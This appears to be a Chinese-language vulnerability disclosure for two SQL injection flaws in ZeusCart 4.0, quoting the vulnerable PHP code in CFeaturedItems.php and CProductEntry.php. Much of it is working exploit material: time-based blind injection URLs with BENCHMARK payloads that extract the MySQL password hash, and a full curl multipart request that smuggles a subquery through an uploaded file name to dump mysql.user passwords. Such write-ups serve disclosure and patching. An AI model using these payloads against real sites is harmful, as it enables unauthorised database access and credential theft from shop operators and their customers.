ZeusCart v4.0 /classes/Core/CFeaturedItems.php SQL注入

<p>ZeusCart 4.0: SQL Injection</p><p>1.漏洞描述</p><p>在ZeusCart4.0中存在两个注入漏洞，一个注入不需要任何条件即可exploit，另一个是是发生在admin后台的注入。</p><p>因为大部分参数都是依赖于简单的过滤，所以很容易由于过滤不全而产生漏洞。</p><p>2a. Timing based Blind SQL Injection 基于时间的盲注</p><p>证明：</p><p><a href="http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1" rel="nofollow">http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1</a></p><p>AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null)</p><p>-&gt; true</p><p>&nbsp;</p><p><a href="http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1" rel="nofollow">http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1</a></p><p>AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null)</p><p>-&gt; false</p><p>payload中不可以使用引号，引号已经被过滤掉。</p><p>通过盲注get mysql密码</p><p><a href="http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1" rel="nofollow">http://localhost/zeuscart-master/index.php?do=featured&amp;action=showmaincatlanding&amp;maincatid=-1</a></p><p>AND IF(ascii(substring((SELECT password from mysql.user limit</p><p>0,1),1,1))=42,BENCHMARK(500000000,version()),null)</p><p>-&gt; true, password hash starts with *</p><p>&nbsp;</p><p>发生漏洞位于/classes/Core/CFeaturedItems.php文件中的$maincatid参数注入。</p><p>Code</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /classes/Core/CFeaturedItems.php:52</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $maincatid = $_GET['maincatid'];//这里很明显没有进行进一步的过滤</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [...]</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $sql = "SELECT DISTINCT a.category_name AS</p><p>Category,a.category_id AS maincatid, b.category_name AS SubCategory,</p><p>b.category_id as subcatid, b.category_image AS image FROM category_table</p><p>a INNER JOIN category_table b ON a.category_id = b.category_parent_id</p><p>WHERE b.category_parent_id=".$maincatid." AND b.category_status=1 ";</p><p>&nbsp;</p><p>2b. 在后台发生的注入（需要admin权限）</p><p>&nbsp;</p><p>所有的GET,POST,REQUEST参数都经过filter_var函数进行过滤用来防御sql注入和xss</p><p>但是对于大部分查询，没有进行更加深入详细的过滤。</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp; Log in as admin</p><p>&nbsp;&nbsp;&nbsp; Create a new product, using a file name for ufile[0] like:</p><p>"image.jpgblla', description=(SELECT password FROM mysql.user limit</p><p>0,1), image='test</p><p>&nbsp;&nbsp;&nbsp; Visiting</p><p><a href="http://localhost/zeuscart-master/admin/index.php?do=aprodetail&amp;action=showprod&amp;prodid=PRODUCTID" rel="nofollow">http://localhost/zeuscart-master/admin/index.php?do=aprodetail&amp;action=showprod&amp;prodid=PRODUCTID</a></p><p>will give the result of the injected query.</p><p>&nbsp;</p><p>Curl command to create a new product:</p><p>&nbsp;</p><p>curl -i -s -k&nbsp; -X 'POST' \</p><p>&nbsp;&nbsp;&nbsp; -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0)</p><p>Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Content-Type:</p><p>multipart/form-data; boundary=--------2025782171' \</p><p>&nbsp;&nbsp;&nbsp; -b 'PHPSESSID=hsa73tae4bq4ev381430dbfif0' \</p><p>&nbsp;&nbsp;&nbsp; --data-binary $'----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0aChoose</p><p>Category\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"selcatgory[]\"\x0d\x0a\x0d\x0a25\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"product_title\"\x0d\x0a\x0d\x0aMYTESTPRODUCT2\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"sku\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"txtweight\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data; name=\"ufile[0]\"; filename=\"image.jpgblla\',</p><p>description=(SELECT password FROM mysql.user limit 0,1),</p><p>image=\'test\"\x0d\x0aContent-Type:</p><p>image/jpeg\x0d\x0a\x0d\x0acontent\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"price\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"msrp_org\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:</p><p>form-data;</p><p>name=\"soh\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171--\x0d\x0a' \</p><p>&nbsp;</p><p>'<a href="http://localhost/zeuscart-master/admin/index.php?do=productentry&amp;action=insert" rel="nofollow">http://localhost/zeuscart-master/admin/index.php?do=productentry&amp;action=insert</a>'</p><p>Code</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; CProductEntry.php:313</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $imgfilename= $_FILES['ufile']['name'][$i];</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $imagefilename =</p><p>date("Y-m-d-His").$imgfilename ; // generate a new name:&nbsp; 2015-9-18image.jpgblla</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $image="images/products/". $imagefilename;</p><p>// updated into DB</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [...]</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($i==0)</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $imgType='main';</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $update="UPDATE products_table set</p><p>image='$image',thumb_image='$thumb_image',large_image_path='$large_image' where</p><p>product_id='".$product_id."'";</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $obj-&gt;updateQuery($update);</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; else</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $imgType='sub';</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($_FILES['ufile']['name'][$i]!='')</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $query_img="INSERT INTO</p><p>product_images_table(product_id,image_path,thumb_image_path,type,large_image_path)</p><p>VALUES('".$product_id."','$image','$thumb_image','$imgType','$large_image')";</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $obj_img=new Bin_Query();</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $obj_img-&gt;updateQuery($query_img);</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p><p>&nbsp;</p>